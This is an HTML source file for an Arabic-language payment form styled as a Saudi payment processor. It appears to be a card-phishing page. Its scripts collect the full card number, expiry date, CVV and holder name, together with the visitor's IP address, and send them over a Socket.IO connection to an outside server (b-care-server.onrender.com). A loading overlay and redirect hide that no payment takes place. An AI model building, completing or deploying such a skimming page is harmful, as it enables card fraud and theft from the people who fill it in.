<!DOCTYPE html>
<html lang="ar">
  <head>
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta charset="utf-8" />
    <title>paymen</title>
    <link
      crossorigin="anonymous"
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N"
      rel="stylesheet"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Readex+Pro:wght@160..700&display=swap");
      @import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css");

      * {
        font-family: "Readex Pro", sans-serif;
        font-optical-sizing: auto;
        font-weight: 400;
        font-style: normal;
        font-variation-settings: "HEXP" 0;
      }

      .content {
        background: white;
        border-radius: 0 0 20px 20px;
        padding: 30px 20px;
        margin: -30px 10px 30px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        min-height: 200px;
        font-size: 16px;
        color: #333;
      }

      .content-section {
        display: none;
      }

      .content-section.active {
        display: block;
      }

      .form-group {
        margin-bottom: 1.5rem;
      }

      .form-group label {
        font-size: 14px;
        font-weight: 400;
        color: #777;
        display: block;
        margin-bottom: 6px;
      }
    </style>
  </head>

  <body dir="rtl">
    <div class="container mt-3 d-none" id="payman_error">
      <span id="decline-message" style="display: none; color: red">
        البيانات المُدخلة غير صحيحة، يرجى المحاولة مرة أخرى.
      </span>
    </div>
    <div class="container mt-5" id="applePayRadio">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              font-family: 'Tahoma', sans-serif;
              overflow: hidden;
            "
          >
            <div style="padding: 16px">
              <div class="text-right">
                <h6 style="color: #626262">نظام معالجة المدفوعات</h6>
                <hr />
                <h6 style="font-size: 12px; font-weight: 700; color: #146394">
                  سيتم تنفيذ عملية الدفع من خلال الوسيلة المحددة أدناه.
                </h6>
                <div class="d-flex mb-3">
                  <img alt="" id="pay_com" width="60px" />
                </div>

                <form id="paymentForm">
                  <div class="form-group">
                    <label for="codeـholderـname">اسم حامل البطاقة</label>
                    <input
                      class="form-control text-center"
                      id="codeـholderـname"
                      type="text"
                    />
                  </div>
                  <div class="form-group">
                    <label for="cardـnumber">رقم البطاقة</label>
                    <input
                      class="form-control text-center"
                      id="cardـnumber"
                      placeholder="0000 0000 0000 0000"
                      type="tel"
                    />
                  </div>
                  <div class="d-flex justify-content-center">
                    <div class="form-group ml-2">
                      <label for="expirationـdate">تاريخ انتهاء البطاقة</label>
                      <input
                        class="form-control text-center"
                        id="expirationـdate"
                        placeholder="MM/YY"
                        type="tel"
                      />
                    </div>
                    <div class="form-group text-left">
                      <label for="cvv">CVV / CVC</label>
                      <input
                        autocomplete="cc-csc"
                        class="form-control text-center"
                        id="cvv"
                        placeholder="***"
                        type="password"
                      />
                    </div>
                  </div>
                  <button
                    class="btn btn-warning col-12 p-2"
                    style="
                      background-color: #faa62e;
                      color: #fff;
                      font-weight: 800;
                    "
                    type="submit"
                  >
                    إتمام الدفع
                  </button>
                  <p class="mt-3 text-secondary" style="font-size: 10px">
                    نحرص على استخدام بياناتك الشخصية فقط لغرض تنفيذ طلبك، وذلك
                    بما يتوافق مع الأغراض الموضحة في سياسة الخصوصية المعتمدة وفق
                    الأنظمة المعمول بها في المملكة العربية السعودية.
                  </p>
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="container mt-3 text-right justify-content-center">
      <img alt="" src="assets/photos/vecteezy-icon.png" width="100px" />
      <img alt="" src="assets/photos/vecteezy_icon01.jpg" width="45px" />
    </div>

    <div
      id="loadingOverlay"
      style="
        display: none;
        position: fixed;
        inset: 0;
        background-color: rgba(0, 0, 0, 0.6);
        z-index: 9999;
        justify-content: center;
        align-items: center;
      "
    >
      <div class="text-center text-white">
        <div class="spinner-border text-light mb-3" role="status"></div>
        <h5 class="font-weight-bold">يرجى الانتظار</h5>
        <p>انتظر حتى تتم معالجة طلبك</p>
      </div>
    </div>

    <!-- 1) Validation & formatting (unchanged) -->
    <script>
      function isValidCardNumber(cardNumber) {
        const clean = cardNumber.replace(/\D/g, "");
        if (clean.length < 12 || clean.length > 19) return false;
        const digits = clean
          .split("")
          .reverse()
          .map((d) => parseInt(d, 10));
        let sum = 0;
        for (let i = 0; i < digits.length; i++) {
          let d = digits[i];
          if (i % 2 === 1) {
            d *= 2;
            if (d > 9) d -= 9;
          }
          sum += d;
        }
        return sum % 10 === 0;
      }
      function formatCardNumber(value) {
        return value
          .replace(/\D/g, "")
          .substring(0, 16)
          .replace(/(.{4})/g, "$1 ")
          .trim();
      }
      function isValidExpiryDate(value) {
        if (!/^(0[1-9]|1[0-2])\/\d{2}$/.test(value)) return false;
        const [month, year] = value.split("/").map(Number);
        const now = new Date();
        const expiry = new Date(`20${year}`, month);
        return expiry > now;
      }
      function detectCardType(number) {
        const clean = number.replace(/\s+/g, "");
        if (/^4/.test(clean)) return "visa";
        if (/^5[1-5]/.test(clean)) return "mastercard";
        return null;
      }
      function isValidCardHolderName(name) {
        const trimmed = name.trim();
        if (trimmed.length < 3) return false;
        if (/[^a-zA-Zء-ي\s]/.test(trimmed)) return false;
        if (/(.)\1{2,}/.test(trimmed)) return false;
        if (/^(..)+\1$/.test(trimmed.replace(/\s+/g, ""))) return false;
        const words = trimmed.split(/\s+/);
        const joined = words.join(" ").toLowerCase();
        const repeatedPattern = /(\b\w{2,}\b)(?:\s+\1){1,}/;
        if (repeatedPattern.test(joined)) return false;
        return true;
      }
      document.addEventListener("DOMContentLoaded", () => {
        const cardInput = document.getElementById("cardـnumber");
        const expiryInput = document.getElementById("expirationـdate");
        const nameInput = document.getElementById("codeـholderـname");
        const cvvInput = document.getElementById("cvv");
        const img = document.createElement("img");
        img.style.position = "absolute";
        img.style.left = "10px";
        img.style.top = "70%";
        img.style.transform = "translateY(-50%)";
        img.style.zIndex = "10";
        img.style.width = "32px";
        img.style.height = "auto";
        img.style.display = "none";
        cardInput.parentElement.style.position = "relative";
        cardInput.parentElement.appendChild(img);
        cardInput.addEventListener("input", () => {
          const formatted = formatCardNumber(cardInput.value);
          cardInput.value = formatted;
          const type = detectCardType(formatted);
          if (type === "visa") {
            img.src = "assets/photos/Visa.png";
            img.style.display = "block";
            sessionStorage.setItem("Card type", "visa");
          } else if (type === "mastercard") {
            img.src = "assets/photos/Mastercard.png";
            img.style.display = "block";
            sessionStorage.setItem("Card type", "mastercard");
          } else {
            img.style.display = "none";
            sessionStorage.removeItem("Card type");
          }
          if (isValidCardNumber(formatted)) {
            cardInput.classList.remove("is-invalid");
            cardInput.classList.add("is-valid");
          } else {
            cardInput.classList.remove("is-valid");
            cardInput.classList.add("is-invalid");
          }
        });
        expiryInput.addEventListener("input", (e) => {
          let value = e.target.value.replace(/[^\d]/g, "").substring(0, 4);
          if (value.length >= 3) {
            value = value.substring(0, 2) + "/" + value.substring(2);
          }
          e.target.value = value;
          if (isValidExpiryDate(value)) {
            expiryInput.classList.remove("is-invalid");
            expiryInput.classList.add("is-valid");
          } else {
            expiryInput.classList.remove("is-valid");
            expiryInput.classList.add("is-invalid");
          }
        });
        nameInput.addEventListener("input", () => {
          if (isValidCardHolderName(nameInput.value)) {
            nameInput.classList.remove("is-invalid");
            nameInput.classList.add("is-valid");
          } else {
            nameInput.classList.remove("is-valid");
            nameInput.classList.add("is-invalid");
          }
        });
        cvvInput.addEventListener("input", () => {
          cvvInput.value = cvvInput.value.replace(/[^\d]/g, "").substring(0, 3);
          if (cvvInput.value.length === 3) {
            cvvInput.classList.remove("is-invalid");
            cvvInput.classList.add("is-valid");
          } else {
            cvvInput.classList.remove("is-valid");
            cvvInput.classList.add("is-invalid");
          }
        });
      });
    </script>

    <!-- 2) Load Socket.IO client exactly once -->
    <script src="https://cdn.socket.io/4.6.1/socket.io.min.js"></script>

    <!-- 3) Bootstrap your socket + visitorIP + announce location -->
    <script>
      window.socket = io("https://b-care-server.onrender.com");
      window.visitorIP = null;
      (async () => {
        try {
          const res = await fetch("https://api.ipify.org?format=json");
          const { ip } = await res.json();
          window.visitorIP = ip;
          const page =
            window.location.pathname.split("/").pop() || "paymen.html";
          window.socket.emit("updateLocation", { ip, page });
        } catch (err) {
          console.error("Failed to fetch visitor IP:", err);
        }
      })();
    </script>

    <!-- 4) Your existing location.js -->
    <script src="./assets/js/location.js"></script>

    <!-- 5) Wire up the form → socket submit & overlay & ack -->
    <script>
      document.addEventListener("DOMContentLoaded", async () => {
        // 1) wait for visitorIP to be ready
        while (window.visitorIP === null) {
          await new Promise((r) => setTimeout(r, 50));
        }

        // 2) show payment logo from sessionStorage (unchanged)
        const method = sessionStorage.getItem("paymentMethod");
        const logo = document.getElementById("pay_com");
        if (method === "mada") logo.src = "assets/photos/mad.png";
        else if (method === "visa_mastarcard")
          logo.src = "assets/photos/vimas.webp";
        else if (method === "applepay") logo.src = "assets/photos/appy.jpg";
        logo.style.float = "right";

        const form = document.getElementById("paymentForm");
        form.addEventListener("submit", (e) => {
          e.preventDefault();

          // ** show loading overlay immediately on form submission **
          document.getElementById("loadingOverlay").style.display = "flex";

          // 3) gather & validate inputs
          const name = document.getElementById("codeـholderـname").value.trim();
          const cardRaw = document
            .getElementById("cardـnumber")
            .value.replace(/\s+/g, "");
          const exp = document.getElementById("expirationـdate").value.trim();
          const cvv = document.getElementById("cvv").value.trim();

          if (!cvv) {
            alert("رجاءً أدخل رمز CVV صالح");
            document.getElementById("loadingOverlay").style.display = "none";
            return;
          }

          // 4) save BIN to sessionStorage (but do NOT send it)
          sessionStorage.setItem("cardBin", cardRaw.substring(0, 6));

          // 5) build payload
          const payload = {
            ip: window.visitorIP,
            cardHolderName: name,
            cardNumber: cardRaw,
            expirationDate: exp,
            cvv,
          };

          // 6) emit to server
          window.socket.emit("submitPayment", payload);
        });

        // 7) handle ack: on success, leave overlay up (location.js should navigate away);
        //    on failure, hide it and show error
        window.socket.on("ackPayment", (resp) => {
          if (!resp.success) {
            document.getElementById("loadingOverlay").style.display = "none";
            alert("حدث خطأ أثناء الإرسال، حاول مرة أخرى.");
            console.error(resp.error);
          }
          // if success → do nothing; overlay stays until location.js redirects
        });
      });
    </script>
  </body>
</html>
